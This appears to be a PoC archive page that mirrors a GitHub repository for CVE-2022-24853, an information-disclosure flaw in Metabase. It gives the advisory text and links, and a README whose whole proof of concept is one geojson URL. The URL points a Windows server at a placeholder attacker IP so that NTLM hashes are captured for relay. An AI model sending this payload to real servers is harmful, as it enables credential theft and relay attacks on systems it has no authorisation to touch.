Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-24853 PoC — Metabase 信息泄露漏洞

Source
https://github.com/secure-77/CVE-2022-24853
Associated Vulnerability
Title:Metabase 信息泄露漏洞 (CVE-2022-24853)
Description:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 存在信息泄露漏洞,该漏洞源于有一个代理,用于加载 JSON 映射的任意 URL,作为我们 GeoJSON 支持的一部分。虽然我们进行验证以不返回任意 URL 的内容,但在某些情况下,精心设计的请求可能导致对 Windows 的文件访问,从而允许启用 NTLM 中继攻击,从而可能允许攻击者接收密码哈希。以下产品和版本受到影响:x.42 - x.42.3、x.41 - x.41.6、 x.40 - x.40.7。
Description
Metabase NTLM Attack
Readme
# CVE-2022-24853
Metabase NTLM Reflection / Relay Attack [CVE-2022-24853](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24853)

Blog Post about the finding: https://secure77.de/metabase-ntlm-relay-attack/

Github Security Advisory: https://github.com/metabase/metabase/security/advisories/GHSA-5cfq-582c-c38m


## POC
```plain
http://metabase-target-server.com/api/geojson?url=jar:file:\<attacker-ip>\test.txt!/
```
File Snapshot

 [4.0K]  /data/pocs/d08363200354f39b3211a0b4241dc5b430bc88d8
└── [ 424]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.